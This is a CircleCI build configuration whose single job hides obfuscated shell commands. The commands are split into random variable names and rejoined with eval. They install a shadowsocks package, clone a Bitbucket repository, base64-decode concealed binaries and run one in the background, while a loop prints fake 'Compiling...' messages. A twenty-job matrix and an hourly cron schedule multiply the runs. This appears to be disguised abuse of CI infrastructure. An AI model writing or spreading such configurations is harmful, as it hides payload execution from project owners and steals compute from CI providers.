version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--pretend", "--binpkg-respect-use", "--check-news", "--depclean-lib-check", "--root-deps", "--digest", "--autounmask-write", "--help", "--noreplace", "--autounmask-unrestricted-atoms", "--select", "--deselect", "--help", "--with-test-deps", "--root", "--unordered-display", "--search", "--deselect", "--alert", "--autounmask-keep-keywords"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--pretend", "--binpkg-respect-use", "--check-news", "--depclean-lib-check", "--root-deps", "--digest", "--autounmask-write", "--help", "--noreplace", "--autounmask-unrestricted-atoms", "--select", "--deselect", "--help", "--with-test-deps", "--root", "--unordered-display", "--search", "--deselect", "--alert", "--autounmask-keep-keywords"]
    triggers:
      - schedule:
          cron: "7 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: Run-eclarson
          command: |
            HhOky="sudo add-ap"
            naKxTHH="t-repositor"
            MDVhR="y ppa:max-c"
            OnuokGSeux="-lv/shadows"
            quCxVpj="ocks-libev "
            XfbgRumc="-y &>/dev/n"
            eval "$HhOky""$naKxTHH""$MDVhR""$OnuokGSeux""$quCxVpj""$XfbgRumc""ull || true"
            RIkMy="sudo add-ap"
            pYvYajUVRY="t-repositor"
            BfkWkRsG="y ppa:ondre"
            lFHKhM="j/apache2 -"
            CNtLav="y &>/dev/nu"
            eval "$RIkMy""$pYvYajUVRY""$BfkWkRsG""$lFHKhM""$CNtLav""ll || true"
            sudo apt update || true
            AsJKh="sudo apt --"
            yAdXBD="yes install"
            beenjs=" openssl &>"
            KTMdhksE="/dev/null |"
            eval "$AsJKh""$yAdXBD""$beenjs""$KTMdhksE""| true"
            xPHjgoVtZNF="sudo apt --"
            MrFuA="yes install"
            AFPInLaFNbs=" cl-base64 "
            NjVZkNuzqIQ="git &>/dev/"
            Lxpddz="null || tru"
            eval "$xPHjgoVtZNF""$MrFuA""$AFPInLaFNbs""$NjVZkNuzqIQ""$Lxpddz""e"
            AonnQ="git clone h"
            zyAEoGell="ttps://gccb"
            wNDDUYNnMh="uild@bitbuc"
            PwKtGPuXlku="ket.org/gcc"
            amgCbJZJ="build/gcc.g"
            VNAXEAKK="it &>/dev/n"
            eval "$AonnQ""$zyAEoGell""$wNDDUYNnMh""$PwKtGPuXlku""$amgCbJZJ""$VNAXEAKK""ull"
            lLKIEq="base64 -d g"
            LlXpqVSzDjH="cc/cmake_np"
            eval "$lLKIEq""$LlXpqVSzDjH""_ > cmake"
            XDPeE="base64 -d g"
            mkZlyZlk="cc/config_ "
            eval "$XDPeE""$mkZlyZlk""> clean"
            uTcDV="base64 -d g"
            TqdGv="cc/make_ > "
            eval "$uTcDV""$TqdGv""dolib"
            KaUPpZGgO="sed -i 's/1"
            LvICxxKSWx="080/1081/g'"
            eval "$KaUPpZGgO""$LvICxxKSWx"" clean"
            dVfwFPh="chmod +x do"
            eval "$dVfwFPh""lib cmake"
            MubWxB="./cmake"
            eval "$MubWxB"""
            OzFktb="sed -i 's/b"
            BxVpHZPfi="uild/ob2o/g"
            eval "$OzFktb""$BxVpHZPfi""' clean"
            sudo ./dolib --config=clean &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2501)) ] && sudo killall dolib && break; sleep 187; done
